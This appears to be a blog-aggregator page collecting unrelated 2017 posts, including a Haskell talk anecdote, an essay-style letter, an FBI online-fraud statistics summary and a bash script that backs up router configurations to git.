deb http://www.preining.info/debian/ calibre main
deb-src http://www.preining.info/debian/ calibre main

The releases are signed with my Debian key 0x6CACA448860CDC13

Enjoy

,

Planet DebianJoachim Breitner: The perils of live demonstrations

Yesterday, I was giving a talk at the The South SF Bay Haskell User Group about how implementing lock-step simulation is trivial in Haskell and how Chris Smith and me are using this to make CodeWorld even more attractive to students. I gave the talk before, at Compose::Conference in New York City earlier this year, so I felt well prepared. On the flight to the West Coast I slightly extended the slides, and as I was too cheap to buy in-flight WiFi, I tested them only locally.

So I arrived at the offices of Target1 in Sunnyvale, got on the WiFi, uploaded my slides, which are in fact one large interactive CodeWorld program, and tried to run it. But I got a type error…

Turns out that the API of CodeWorld was changed just the day before:

commit 054c811b494746ec7304c3d495675046727ab114
Author: Chris Smith <cdsmith@gmail.com>
Date:   Wed Jun 21 23:53:53 2017 +0000

    Change dilated to take one parameter.
    
    Function is nearly unused, so I'm not concerned about breakage.
    This new version better aligns with standard educational usage,
    in which "dilation" means uniform scaling.  Taken as a separate
    operation, it commutes with rotation, and preserves similarity
    of shapes, neither of which is true of scaling in general.

Ok, that was quick to fix, and the CodeWorld server started to compile my code, and compiled, and aborted. It turned out that my program, presumably the larges CodeWorld interaction out there, hit the time limit of the compiler.

Luckily, Chris Smith just arrived at the venue, and he emergency-bumped the compiler time limit. The program compiled and I could start my presentation.

Unfortunately, the biggest blunder was still awaiting for me. I came to the slide where two instances of pong are played over a simulated network, and my point was that the two instances are perfectly in sync. Unfortunately, they were not. I guess it did support my point that lock-step simulation can easily go wrong, but it really left me out in the rain there, and I could not explain it – I did not modify this code since New York, and there it worked flawless2. In the end, I could save my face a bit by running the real pong game against an attendee over the network, and no desynchronisation could be observed there.

Today I dug into it and it took me a while, and it turned out that the problem was not in CodeWorld, or the lock-step simulation code discussed in our paper about it, but in the code in my presentation that simulated the delayed network messages; in some instances it would deliver the UI events in different order to the two simulated players, and hence cause them do something different. Phew.


  1. Yes, the retail giant. Turns out that they have a small but enthusiastic Haskell-using group in their IT department.

  2. I hope the video is going to be online soon, then you can check for yourself.

CryptogramFriday Squid Blogging: Injured Giant Squid Video

A paddleboarder had a run-in with an injured giant squid. Video. Here's the real story.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Planet DebianJoey Hess: PV array is hot

Only took a couple hours to wire up and mount the combiner box.

PV combiner box with breakers

Something about larger wiring like this is enjoyable. So much less fiddly than what I'm used to.

PV combiner box wiring

And the new PV array is hot!

multimeter reading 66.8 DVC

Update: The panels have an open circuit voltage of 35.89 and are in strings of 2, so I'd expect to see 71.78 V with only my multimeter connected. So I'm losing 0.07 volts to wiring, which is less than I designed for.

Cory DoctorowCanada: Trump shows us what happens when “good” politicians demand surveillance powers

The CBC asked me to write an editorial for their package about Canadian identity and politics, timed with the 150th anniversary of the founding of the settler state on indigenous lands. They’ve assigned several writers to expand on themes in the Canadian national anthem, and my line was “We stand on guard for thee.”

I wrote about bill C-51, a reckless, sweeping mass surveillance bill that now-PM Trudeau got his MPs to support when he was in opposition, promising to reform the bill once he came to power.


The situation is analogous to Barack Obama’s history with mass surveillance in the USA: when Obama was a Senator, he shepherded legislation to immunize the phone companies for their complicity with illegal spying under GW Bush, promising to fix the situation when he came to power. Instead, he built out a fearsome surveillance apparatus that he handed to the paranoid, racist Donald Trump, who now gets to use that surveillance system to target his enemies, including 11 million undocumented people in America, and people of Muslim origin.


Now-PM Justin Trudeau has finally tabled some reforms to C-51, but they leave the bill’s worst provisions intact. Even if Canadians trust Trudeau to use these spying powers wisely, they can’t afford to bet that Trudeau’s successors will not abuse them.


Within living memory, our loved ones were persecuted, hounded to suicide, imprisoned for activities that we recognize today as normal and right: being gay, smoking pot, demanding that settler governments honour their treaties with First Nations. The legitimization of these activities only took place because we had a private sphere in which to agitate for them.

Today, there are people you love, people I love, who sorrow over their secrets about their lives and values and ambitions, who will go to their graves with that sorrow in their minds — unless we give them the private space to choose the time and manner of their disclosure, so as to maximize the chances that we will be their allies in their struggles. If we are to stand on guard for the future of Canada, let us stand on guard for these people, for they are us.


What happens after the ‘good’ politicians give away our rights? Cory Doctorow shares a cautionary tale.

[Cory Doctorow/CBC]


(Image:
Jean-Marc Carisse, CC-BY; Trump’s Hair)

CryptogramThe Secret Code of Beatrix Potter

Interesting:

As codes go, Potter's wasn't inordinately complicated. As Wiltshire explains, it was a "mono-alphabetic substitution cipher code," in which each letter of the alphabet was replaced by a symbol­ -- the kind of thing they teach you in Cub Scouts. The real trouble was Potter's own fluency with it. She quickly learned to write the code so fast that each sheet looked, even to Linder's trained eye, like a maze of scribbles.

TEDWhy TED takes two weeks off every summer

Why_we_close_983pxTED.com is about to go quiet for two weeks. No new TED Talks will be posted on the web until Monday, July 10, 2017, while most of the TED staff takes our annual two-week vacation.

Yes, we all (or almost all) go on vacation at the same time. No, we don’t all go to the same place.

We’ve been doing it this way now for eight years. Our summer break is a little lifehack that solves the problem of a company in perpetual-startup mode where something new is always going on and everyone has raging FOMO. We avoid the fear of missing out on emails and new projects and blah blah blah … by making sure that nothing is going on.

I love how the inventor of this holiday, TED’s founding head of media June Cohen, once explained it: “When you have a team of passionate, dedicated overachievers, you don’t need to push them to work harder, you need to help them rest. By taking the same two weeks off, it makes sure everyone takes vacation,” she said. “Planning a vacation is hard — most of us still feel a little guilty to take two weeks off, and we’d be likely to cancel when something inevitably comes up. This creates an enforced rest period, which is so important for productivity and happiness.”

Bonus: “It’s efficient,” she said. “In most companies, people stagger their vacations through the summer. But this means you can never quite get things done all summer long. You never have all the right people in the room.”

So, as the bartender said: You don’t have to go home, but you can’t stay here. We won’t post new TED Talks on the web for the next two weeks. (Though — check out audio talks on iTunes, where we’re curating two weeks of talks on the theme of Journeys.) The office is three-quarters empty. And we stay off email. The whole point is that vacation time should be truly restful, and we should be able to recharge without having to check in or worry about what we’re missing back at the office.

See you on Monday, July 10!

Note: This piece was first posted on July 17, 2014. It was updated on July 27, 2015, again on July 20, 2016, and again on June 23, 2017.


LongNowThe Artangel Longplayer Letters: Iain Sinclair writes to Alan Moore

Iain Sinclair (left) chose Alan Moore as the recipient of his Longplayer letter.


In November 02015, Manuel Arriga  wrote a letter to Giles Fraser as part of the Artangel Longplayer Letters series. The series is a relay-style correspondence: The first letter was written by Brian Eno to Nassim Taleb. Nassim Taleb then wrote to Stewart Brand, and Stewart wrote to Esther Dyson, who wrote to Carne Ross, who wrote to John Burnside, who wrote to Manuel Arriaga, who wrote to Giles Fraser, which remains unanswered.

In June 02017, the Longplayer Trust initiated a new correspondence, beginning with Iain Sinclair, a writer and filmmaker whose recent work focuses on the psychogeography of London, writing to graphic novel writer Alan Moore, who will respond with a letter to a recipient of his choosing.

The discussion thus far has focused on the extent and ways government and technology can foster long-term thinking. You can find the previous correspondences here.


Hackney: 30 January 2017

Dear Alan,

We are being invited, by means of predatory technologies neither of us advocate or employ, to consider ‘long-term thinking’. But already I’m coughing up the fishbone of that hyphen and going into electroconvulsive spasms over this requirement to think about thinking – and at a late stage in my own terrestrial transit when I know all too well that there is no longterm. The diminishing future, protected by a feeble envelope of identity, has already been used up, wantonly. And the past was always a looped mistake plaguing us with repeated flares of shame. Those smells and textures, wet and warm, cabbage and custard, get sharper even as our faculties fail. I pick them up very easily by fingering the close-planted acres of your Jerusalem. The first great English scratch-and-sniff epic.

“And now,” as Sebald said, “I am living the wrong life.” Having tried, for too many years, to muddy the waters with untrustworthy fictions and ‘alternative truths’, books that detoured into other books, I am now colonised by longplaying images and private obsessions, vinyl ghosts in an unmapped digital multiverse. This is the fate we must accept, some more gratefully than others, before we let the whole slithery viscous mess go and sink into nothingness.

“Unexplained but not suspicious,” they concluded about the premature death of George Michael. They could, just as easily, have been talking about his life. About all our lives.

I remember Jeremy Prynne, when I first came across him, being affronted (and amused) by a request from a Canadian academic/poet for: ‘an example of your thought’. ‘Like a lump of basalt,’ he snorted. Reaching for his geological toffee-hammer. Thinking was something else: an energy field, a process that happened outside and beyond the will of the thinker. Like snow. Or waves. Or television. And with the unstated aim of eliminating egoic interference. A solitary amputated ‘thought’, framed for display, would be as horrifying as that morning radio interlude when listeners channel-hop or make their cups of tea: Thought for the Day. Hospital homilies with ecumenical bent for an immobile and chemically-coshed constituency.

But I do think (misrepresent, subvert) about a notion you once expressed: time as a solid. ‘Eternalism’ as a sort of Swedenborgian block – like a form of discontinued public housing in which pastpresentfuture coexist, shoulder-to-shoulder: legions of the persistent and half-erased dead, fictional avatars more real now than their creators, the unborn, aborted and nearly-born, and the vegetative buddhas on hard benches, all whispering and jabbering and going about their meaningless business. Each of them invisible to the others. Probably in Northampton. Probably in a few streets of Northampton. Your beloved Boroughs. Which are also burrows (and Burroughs). They are hidden in plain sight in that narcoleptic trance between slow-waking and swift-dying, adrift in the nuclear fusion of dusk and dawn. In moving meadows by some unmoving river. They sweat uphill on arterial roads: tramps, pilgrims, levellers, ranters, bootmakers, working mothers festooned with infants, prostitutes, immigrants, damaged seers and local artists, incarcerated poets and skewed uncles around a snooker table in some defunct and cobwebby Labour Club. And all the ones who are still waiting to become Alan Moore.

“The living can assist the imagination of the dead,” Yeats wrote in A Vision. I started my journey through London with that sentence and I’ve never got beyond it. The ambition remains: to be ventriloquised, tapped, channelled. “Life rewritten by life,” as Brian Catling puts it. Longterm is a deranged Xerox printer spewing out copies of copies, until the image is bleached to snowblind illegibility. Examine any seriously popular production, any universally endorsed philosophy, and you can peel it back, layer by layer, to some obscure and unheralded madman in a cluttered cabin, muttering to himself and sketching occulted diagrams of influences and interconnections. Successive reboots bring the unspeakable (better left in silence) closer to the ear, a process infinitely accommodated now by the speed of the digital web. Where nothing is true and none of it matters. And you finish with Donald Trump. Ubu of the internet.

“The illusion of mortality, post-Einstein,” you say. The neighbourly undead patrol their limitless limits: “soiled simultaneity.” That pregnant now in which the past is struggling to suppress its dreadful future. To escape the cull of gravity.  I have never been able to deal in abstractions. I like detail, glinting particulars. Anecdotes.

After noticing uniformed kids tramping, every morning, to their flatpack Academy by the canal, infested with hissing earworms, Nuremberg headphones, tablets held out in front of them like tiny trays of cocktail sausages, I registered a boy and a girl talking very quietly, not wanting to break the concentration of an older girl – who is reading as she walks: James Joyce. And, at the same time, under a Shoreditch railway bridge, there appeared, above a set of recycling bins (‘Trade Mixed Glass’), a portrait of the Ulysses author, with one blackened lens and an unnecessary title: REBEL. Which set me ‘thinking’ about your Jerusalem and the way you tap Lucia Joyce, or recover the aftershock of her Northampton confinement by total immersion in the Babel of Finnegans Wake. Your speculative punt calls up the Burroughs notion of the ‘image vine’: once you have committed to a single image (or word), the next one is fated to follow. By the time of those methadone-managed twilight years in Kansas, Burroughs had exorcised the demons that made him write, the karma of shooting his wife in Mexico City. He used up the days that were left in attending to his cats, making splat-art with his guns and recording his dreams.

“Couldn’t find my room as usual in the Land of the Dead. Followed by bounty hunters.” Postmortem, Bill is still looking for trigger episodes. “It seems that cities are being moved from one place to another.” The Place of Dead Roads, he calls it. And in Jerusalem, you catch very well those freaks of random, punctured illumination. “Each vital second of her life was there as an exquisite moving miniature, filled with the most intense significance and limned in colours so profound they blazed, yet not set in any noticeable order.”

My hunch is this: that Eternalism, the long-player’s ultimate longplay, is located in residues of sleep, in the community of sleepers, between worlds, beyond mortality. I dreamed my genesis in sweat of sleep. There was a dream, one of a series, that I failed to record, but which felt like a reprise of aspects of that film with which we were both involved, The Cardinal and the Corpse. So many of the cast are now dead, locked up, disappeared, but still in play, their voices, their persons, that they secure territory (and time), a privileged past. We were in the Princelet Street synagogue, climbing the stairs (as you did in that house with the peeling pink door), towards an attic chamber that was also a curtained confessional box. With Chris Petit, obviously, as the hovering cardinal (actually a madhouse keeper from Sligo). We managed a ritual exchange of velvet cricket caps before the world outside the window started to spin, day to night, years to centuries, stars going out, suns born, like The House on the Borderland. Martin Stone, laying out a pattern of white lines on his black case, told us that he had just found, in an abandoned villa outside Nice, a lavishly inscribed copy of the first edition that once belonged to Aleister Crowley. But he had decided it to keep it.

If the integrity of time breaks down, place is confirmed. I’m thinking about the Northampton Boroughs, about your friend and mentor, Steve Moore, on Shooter’s Hill. And how Steve sourced the dream of what would happen, his abrupt transference, while sticking around, polishing the Japanese energy shield, long enough to confirm his own predictions, and to allow others to appreciate the narrative arc of his death. That long, long preparation – in vision and domestic reality – you describe in City of Disappearances.

The trick then, the quest we’re all on, is to identify and honour those neural pathways: the trench you print out in Jerusalem, worn by steel-shod boots, between Northampton and Lambeth. The fugue of movement. A man who is here. Who vanishes. And reappears. Is he the same? Are you? Something carries this walker, like John Clare, out on an English road: foot-foundered, gobbling at verges, sleeping in ditches. In the expectation of reconnecting with an extinguished muse: youth, innocence, desire. That is the only longplay I have encountered: one journey fading into the next. No thought. No thinking. Drift. Reverie. As you say, ‘Panoramic portrait over lofty landscape.’ Every time.


Iain Sinclair was born in Cardiff. He left almost immediately. He has lived and worked around Hackney for almost 50 years, but the local terrain is a strange and enticing as ever. Books – including Lud HeatDownriverLondon OrbitalAmerican Smoke – have been published. And there have been filmic collaborations with Chris Petit and Andrew Kötting, among others. Sinclair has recently completed The Last London, the final volume in a long sequence.

Alan Moore was born in Northampton in 1953 and is a writer, performer, recording artist, activist and magician.His comic-book work includes Lost Girls with Melinda Gebbie, From Hell with Eddie Campbell and The League of Extraordinary Gentlemen with Kevin O’Neill. He has worked with director Mitch Jenkins on the Showpieces cycle of short films and on forthcoming feature film The Show, while his novels include Voice of the Fire (1996) and his current epic Jerusalem (2016). Only about half as frightening as he looks, he lives in Northampton with his wife and collaborator Melinda Gebbie.

TEDTEDWomen update: Black Lives Matter wins Sydney Peace Prize

Founders of the Black Lives Matter movement — from left, Alicia Garza, Patrisse Cullors and Opal Tometi, interviewed onstage by TEDWomen cohost Mia Birdsong at TEDWomen 2016 in San Francisco. Photo: Marla Aufmuth / TED

Cross-posted from TEDWomen curator Pat Mitchell’s blog on the Huffington Post.

Last month, the Black Lives Matter movement was awarded the Sydney Peace Prize, a global prize that honors those who pursue “peace with justice.” Past honorees include South African Archbishop Desmond Tutu and Irish President Mary Robinson.

The prize “recognizes the vital contributions of leading global peacemakers, creates a platform so that their voices are heard, and supports their vital work for a fairer world.” Winners receive $50,000 to help them continue their work.

One of the highlights of last year’s TEDWomen was a conversation with Black Lives Matter founders Alicia Garza, Patrisse Cullors and Opal Tometi. They spoke with Mia Birdsong about the movement and their commitment to working collaboratively for change. As Tometi told Birdsong: “We need to acknowledge that different people contribute different strengths, and that in order for our entire team to flourish, we have to allow them to share and allow them to shine.”

This year’s TEDWomen conference (registration is open), which will be held in New Orleans November 1–3, 2017, will expand on many of the themes Garza, Cullors, Tometi and Birdsong touched on during their conversation last year. This year’s conference theme is Bridges — and we’ll be looking at how individuals and organizations create bridges between races, cultures, people, and places — and, as modeled by the Black Lives Matter movement, how we build bridges to a more equal and just world.

In announcing the award, the Sydney Peace Foundation said, “This is the first time that a movement and not a person has been awarded the peace prize — a timely choice. Climate change is escalating fast, increasing inequality and racism are feeding divisiveness, and we are in the middle of the worst refugee crisis since World War II. Yet many establishment leaders across the world stick their heads in the sand or turn their backs on justice, fairness and equality.”

Founders Garza, Cullors and Tometi will travel to Australia later this year to formally accept the prize.

Congratulations to them!


Planet DebianElena 'valhalla' Grandi: On brokeness, the live installer and being nice to people

On brokeness, the live installer and being nice to people

This morning I've read this blog.einval.com/2017/06/22#tro.

I understand that somebody on the internet will always be trolling, but I just wanted to point out:

* that the installer in the old live images has been broken (for international users) for years
* that nobody cared enough to fix it, not even the people affected by it (the issue was reported as known in various forums, but for a long time nobody even opened an issue to let the *developers* know).

Compare this with the current situation, with people doing multiple tests as the (quite big number of) images were being built, and a fix released soon after for the issues found.

I'd say that this situation is great, and that instead of trolling around we should thank the people involved in this release for their great job.

Planet DebianJonathan Dowland: WD drive head parking update

An update for my post on Western Digital Hard Drive head parking: disabling the head-parking completely stopped the Load_Cycle_Count S.M.A.R.T. attribute from incrementing. This is probably at the cost of power usage, but I am not able to assess the impact of that as I'm not currently monitoring the power draw of the NAS (Although that's on my TODO list).

Sociological ImagesIs it ethical to give your child “every advantage”?

Flashback Friday.

Stiff competition for entrance to private preschools and kindergartens in Manhattan has created a test prep market for children under 5. The New York Times profiled Bright Kids NYC. The owner confesses that “the parents of the 120 children her staff tutored [in 2010] spent an average of $1,000 on test prep for their 4-year-olds.”  This, of course, makes admission to schools for the gifted a matter of class privilege as well as intelligence.

The article also tells the story of a woman without the resources to get her child, Chase, professional tutoring:

Ms. Stewart, a single mom working two jobs, didn’t think the process was fair. She had heard widespread reports of wealthy families preparing their children for the kindergarten gifted test with $90 workbooks, $145-an-hour tutoring and weekend “boot camps.”

Ms. Stewart used a booklet the city provided and reviewed the 16 sample questions with Chase. “I was online trying to find sample tests,” she said. “But everything was $50 or more. I couldn’t afford that.”

Ms. Stewart can’t afford tutoring for Chase; other parents can. It’s unfair that entrance into kindergarten level programs is being gamed by people with resources, disadvantaging the most disadvantaged kids from the get go. I think many people will agree.

But the more insidious value, the one that almost no one would identify as problematic, is the idea that all parents should do everything they can to give their child advantages. Even Ms. Stewart thinks so. “They want to help their kids,” she said. “If I could buy it, I would, too.”

Somehow, in the attachment to the idea that we should all help our kids get every advantage, the fact that advantaging your child disadvantages other people’s children gets lost.  If it advantages your child, it must be advantaging him over someone else; otherwise it’s not an advantage, you see?

I felt like this belief (that you should give your child every advantage) and it’s invisible partner (that doing so is hurting other people’s children) was rife in the FAQs on the Bright Kids NYC website.

Isn’t my child too young to be tutored?

These programs are very competitive, the answers say, and you need to make sure your kid does better than other children.  It’s never too soon to gain an advantage.

My child is already bright, why does he or she need to be prepared?

Because being bright isn’t enough.  If you get your kid tutoring, she’ll be able to show she’s bright in exactly the right way. All those other bright kids that can’t get tutoring won’t get in because, after all, being bright isn’t enough.

Is it fair to “prep” for the standardized testing?

Of course it’s fair, the website claims!  It’s not only fair, it’s “rational”!  What parent wouldn’t give their child an advantage!?  They avoid actually answering the question. Instead, they make kids who don’t get tutoring invisible and then suggest that you’d be crazy not to enroll your child in the program.

My friend says that her child got a very high ERB [score] without prepping.  My kid should be able to do the same.

Don’t be foolish, the website responds. This isn’t about being bright, remember. Besides, your friend is lying. They’re spending $700,000 dollars on their kid’s schooling (aren’t we all!?) and we can’t disclose our clients but, trust us, they either forked over a grand to Bright Kids NYC or test administrators.

Test prep for kindergartners seems like a pretty blatant example of class privilege. But, of course, the argument that advantaging your own kid necessarily involves disadvantaging someone else’s applies to all sorts of things, from tutoring, to a leisurely summer with which to study for the SAT, to financial support during their unpaid internships, to helping them buy a house and, thus, keeping home prices high.

I think it’s worth re-evaluating. Is giving your kid every advantage the moral thing to do?

Lisa Wade, PhD is a professor at Occidental College. She is the author of American Hookup, a book about college sexual culture, and a textbook about gender. You can follow her on Twitter, Facebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Planet DebianBits from Debian: Hewlett Packard Enterprise Platinum Sponsor of DebConf17

HPElogo

We are very pleased to announce that Hewlett Packard Enterprise (HPE) has committed support to DebConf17 as a Platinum sponsor.

"Hewlett Packard Enterprise is excited to support Debian's annual developer conference again this year", said Steve Geary, Senior Director R&D at Hewlett Packard Enterprise. "As Platinum sponsors and member of the Debian community, HPE is committed to supporting Debconf. The conference, community and open distribution are foundational to the development of The Machine research program and will our bring our Memory Driven Computing agenda to life."

HPE is one of the largest computer companies in the world, providing a wide range of products and services, such as servers, storage, networking, consulting and support, software, and financial services.

HPE is also a development partner of Debian, and provides hardware for port development, Debian mirrors, and other Debian services (hardware donations are listed in the Debian machines page).

With this additional commitment as Platinum Sponsor, HPE contributes to make possible our annual conference, and directly supports the progress of Debian and Free Software helping to strengthen the community that continues to collaborate on Debian projects throughout the rest of the year.

Thank you very much Hewlett Packard Enterprise, for your support of DebConf17!

Become a sponsor too!

DebConf17 is still accepting sponsors. Interested companies and organizations may contact the DebConf team through sponsors@debconf.org, and visit the DebConf17 website at https://debconf17.debconf.org.

Krebs on SecurityFBI: Extortion, CEO Fraud Among Top Online Fraud Complaints in 2016

Online extortion, tech support scams and phishing attacks that spoof the boss were among the most costly cyber scams reported by consumers and businesses last year, according to new figures from the FBI’s Internet Crime Complaint Center (IC3).

The IC3 report released Thursday correctly identifies some of the most prevalent and insidious forms of cybercrimes today, but the total financial losses tied to each crime type also underscore how infrequently victims actually report such crimes to law enforcement.

Source: Internet Crime Complaint Center (IC3).

Source: Internet Crime Complaint Center (IC3).

For example, the IC3 said it received 17,146 extortion-related complaints, with an adjusted financial loss totaling just over $15 million. In that category, the report identified 2,673 complaints identified as ransomware — malicious software that scrambles a victim’s most important files and holds them hostage unless and until the victim pays a ransom (usually in a virtual currency like Bitcoin).

According to the IC3, the losses associated with those ransomware complaints totaled slightly more than $2.4 million. Writing for BleepingComputer.com — a tech support forum I’ve long recommended that helps countless ransomware victims — Catalin Cimpanu observes that the FBI’s ransomware numbers “are ridiculously small compared to what happens in the real world, where ransomware is one of today’s most prevalent cyber-threats.”

“The only explanation is that people are paying ransoms, restoring from backups, or reinstalling PCs without filing a complaint with authorities,” Cimpanu writes.

It’s difficult to know how what percentage of ransomware victims paid the ransom or were able to restore from backups, but one thing is for sure: Relatively few victims are reporting cyber fraud to federal investigators.

The report notes that only an estimated 15 percent of the nation’s fraud victims report their crimes to law enforcement. For 2016, 298,728 complaints were received, with a total victim loss of $1.33 billion.

If that 15 percent estimate is close to accurate, that means the real cost of cyber fraud for Americans last year was probably closer to $9 billion, and the losses from ransomware attacks upwards of $16 million.

The IC3 reports that last year it received slightly more than 12,000 complaints about CEO fraud attacks — e-mail scams in which the attacker spoofs the boss and tricks an employee at the organization into wiring funds to the fraudster. The fraud-fighting agency said losses from CEO fraud (also known as the “business email compromise” or BEC scam) totaled more than $360 million.

Applying that same 15 percent rule, that brings the likely actual losses from CEO fraud schemes to around $2.4 billion last year.

Some 10,850 businesses and consumers reported being targeted by tech support scams last year, with the total reported loss at around $7.8 million. Perhaps unsurprisingly, the IC3 report observed that victims in older age groups reported the highest losses.

Many other, more established types of Internet crimes — such as romance scams and advanced fee fraud — earned top rankings in the report. Check out the full report here (PDF). The FBI urges all victims of computer crimes to report the incidents at IC3.gov. The IC3 unit is part of the FBI’s Cyber Operations Section, and it uses the reports to compile and refer cases for investigation and prosecution.

Source: IC3

Source: IC3

Worse Than FailureError'd: Perfectly Logical

"Outlook can't open an attachment because it claims that it was made in Outlook, which Outlook doesn't think is installed...or something," writes Gavin.

 

Mitch wrote, "So, the problems I'm having with activating Windows 10 is that I need to install Windows 10. Of course!"

 

"I don't expect 2018 to come around," writes Adam K., "Instead we'll all be transported back to 2014!"

 

"Here I thought that the world had gone mad, but then I remembered that I had a currency converter add-on installed," writes Shahim M.

 

John S. wrote, "It's good to know that the important notices are getting priority!"

 

Michael D. wrote, "It's all fun and games until someone tries to exit the conference room while someone else is quenching their thirst."

 

[Advertisement] Atalasoft’s imaging SDKs come with APIs & pre-built controls for web viewing, browser scanning, annotating, & OCR/barcode capture. Try it for 30 days with included support.

Planet DebianArturo Borrero González: Backup router/switch configuration to a git repository

git

Most routers/switches out there store their configuration in plain text, which is nice for backups. I’m talking about Cisco, Juniper, HPE, etc. The configuration of our routers are being changed several times a day by the operators, and in this case we lacked some proper way of tracking these changes.

Some of these routers come with their own mechanisms for doing backups, and depending on the model and version perhaps they include changes-tracking mechanisms as well. However, they mostly don’t integrate well into our preferred version control system, which is git.

After some internet searching, I found rancid, which is a suite for doing tasks like this. But it seemed rather complex and feature-full for what we required: simply fetch the plain text config and put it into a git repo.

Worth noting that the most important drawback of not triggering the change-tracking from the router/switch is that we have to follow a polling approach: loggin into each device, get the plain text and the commit it to the repo (if changes detected). This can be hooked in cron, but as I said, we lost the sync behaviour and won’t see any changes until the next cron is run.

In most cases, we lost authorship information as well. But it was not important for us right now. In the future this is something that we will have to solve.

Also, some routers/switches lack some basic SSH security improvements, like public-key authentication, so we end having to hard-code user/pass in our worker script.

Since we have several devices of the same type, we just iterate over their names.

For example, this is what we use for hp comware devices:

#!/bin/bash
# run this script by cron

USER="git"
PASSWORD="readonlyuser"
DEVICES="device1 device2 device3 device4"

FILE="flash:/startup.cfg"
GIT_DIR="myrepo"
GIT="/srv/git/${GIT_DIR}.git"

TMP_DIR="$(mktemp -d)"
if [ -z "$TMP_DIR" ] ; then
	echo "E: no temp dir created" >&2
	exit 1
fi

GIT_BIN="$(which git)"
if [ ! -x "$GIT_BIN" ] ; then
	echo "E: no git binary" >&2
	exit 1
fi

SCP_BIN="$(which scp)"
if [ ! -x "$SCP_BIN" ] ; then
	echo "E: no scp binary" >&2
	exit 1
fi

SSHPASS_BIN="$(which sshpass)"
if [ ! -x "$SSHPASS_BIN" ] ; then
	echo "E: no sshpass binary" >&2
	exit 1
fi

# clone git repo
cd $TMP_DIR
$GIT_BIN clone $GIT
cd $GIT_DIR

for device in $DEVICES; do
	mkdir -p $device
	cd $device

	# fetch cfg
	CONN="${USER}@${device}"
	$SSHPASS_BIN -p "$PASSWORD" $SCP_BIN ${CONN}:${FILE} .

	# commit
	$GIT_BIN add -A .
	$GIT_BIN commit -m "${device}: configuration change" \
		-m "A configuration change was detected" \
		--author="cron <cron@example.com>"

	$GIT_BIN push -f
	cd ..
done

# cleanup
rm -rf $TMP_DIR

You should create a read-only user ‘git’ in the devices. And beware that each device model has the config file stored in a different place.

For reference, in HP comware, the file to scp is flash:/startup.cfg. And you might try creating the user like this:

local-user git class manage
 password hash xxxxx
 service-type ssh
 authorization-attribute user-role security-audit
#

In Junos/Juniper, the file you should scp is /config/juniper.conf.gz and the script should gunzip the data before committing. For the read-only user, try is something like this:

system {
	[...]
	login {
		[...]
		class git {
			permissions maintenance;
			allow-commands scp.*;
		}
		user git {
			uid xxx;
			class git;
			authentication {
				encrypted-password "xxx";
			}
		}
	}
}

The file to scp in HP procurve is /cfg/startup-config. And for the read-only user, try something like this:

aaa authorization group "git user" 1 match-command "scp.*" permit
aaa authentication local-user "git" group "git user" password sha1 "xxxxx"

What would be the ideal situation? Get the device controlled directly by git (i.e. commit –> git hook –> device update) or at least have the device to commit the changes by itself to git. I’m open to suggestions :-)

Don MartiFun with dlvr.it

Check it out—I'm "on Facebook" again. Just fixed my gateway through dlvr.it. If you're reading this on Facebook, that's why.

Dlvr.it is a nifty service that will post to social sites from an RSS feed. If you don't run your own linklog feed, the good news is that Pocket will generate RSS feeds from the articles you save, so if you want to share links with people still on Facebook, the combination of Pocket and dlvr.it makes that easy to do without actually spending human eyeball time there.

There's a story about Thomas Nelson, Jr., leader of the Virginia Militia in the Revolutionary War.

During the siege and battle Nelson led the Virginia Militia whom he had personally organized and supplied with his own funds. Legend had it that Nelson ordered his artillery to direct their fire on his own house which was occupied by Cornwallis, offering five guineas to the first man who hit the house.

Would Facebook's owners do the same, now that we know that foreign interests use Facebook to subvert America? Probably not. The Nelson story is just an unconfirmed patriotic anecdote, and we can't expect that kind of thing from today's post-patriotic investor class. Anyway, just seeing if I can move Facebook's bots/eyeballs ratio up a little.

,

Planet DebianSteve McIntyre: -1, Trolling

Here's a nice comment I received by email this morning. I guess somebody was upset by my last post?

From: Tec Services <tecservices911@gmail.com>
Date: Wed, 21 Jun 2017 22:30:26 -0700
To: steve@einval.com
Subject: its time for you to retire from debian...unbelievable..your
         the quality guy and fucked up the installer!

i cant ever remember in the hostory of computing someone releasing an installer
that does not work!!

wtf!!!

you need to be retired...due to being retarded..

and that this was dedicated to ian...what a
disaster..you should be ashames..he is probably roling in his grave from shame
right now....

It's nice to be appreciated.

Planet Linux AustraliaChris Neugebauer: Hire me!

tl;dr: I’ve recently moved to the San Francisco Bay Area, received my US Work Authorization, so now I’m looking for somewhere  to work. I have a résumé and an e-mail address!

I’ve worked a lot in Free and Open Source Software communities over the last five years, both in Australia and overseas. While much of my focus has been on the Python community, I’ve also worked more broadly in the Open Source world. I’ve been doing this community work entirely as a volunteer, most of the time working in full-time software engineering jobs which haven’t related to my work in the Open Source world.

It’s pretty clear that I want to move into a job where I can use the skills I’ve been volunteering for the last few years, and put them to good use both for my company, and for the communities I serve.

What I’m interested in doing fits best into a developer advocacy or community management sort of role. Working full-time on helping people in tech be better at what they do would be just wonderful. That said, my background is in code, and working in software engineering with a like-minded company would also be pretty exciting (better still if I get to write a lot of Python).

  • Something with a strong developer relations element. I enjoy working with other developers, and I love having the opportunity to get them excited about things that I’m excited about. As a conference organiser, I’m very aware of the line between terrible marketing shilling, and genuine advocacy by and for developers: I want to help whoever I work for end up on the right side of that line.
  • Either in San Francisco, North of San Francisco, or Remote-Friendly. I live in Petaluma, a lovely town about 50 minutes north of San Francisco, with my wonderful partner, Josh. We’re pretty happy up here, but I’m happy to regularly commute as far as San Francisco. I’ll consider opportunities in other cities, but they’d need to primarily be remote.
  • Relevant to Open Source. The Open Source world is where my experience is, it’s where I know people, and it’s the world where I can be most credible. This doesn’t mean I need to be working on open source itself, but I’d love to be able to show up at OSCON or linux.conf.au and be excited to have my company’s name on my badge.

Why would I be good at this? I’ve been working on building and interacting with communities of developers, especially in the Free and Open Source Software world, for the last five years.

You can find a complete list of what I’ve done in my résumé, but here’s a selection of what I think’s notable:

  • Co-organised two editions of PyCon Australia, and led the linux.conf.au 2017 team. I’ve led PyCon AU, from inception, to bidding, to the successful execution for two years in a row. As the public face of PyCon AU, I made sure that the conference had the right people interested in speaking, and that we had many from Australian Python community interested in attending. I took what I learned at PyCon AU and applied it to run linux.conf.au 2017, where our CFP attracted its largest ever response (beating the previous record by more than 30%).
  • Developed Registrasion, an open source conference ticket system. I designed and developed a ticket sales system that allowed for automation of the most significant time sinks that linux.conf.au and PyCon Australia registration staff had experienced in previous years. Registrasion was Open Sourced, and several other conferences are considering adopting it.
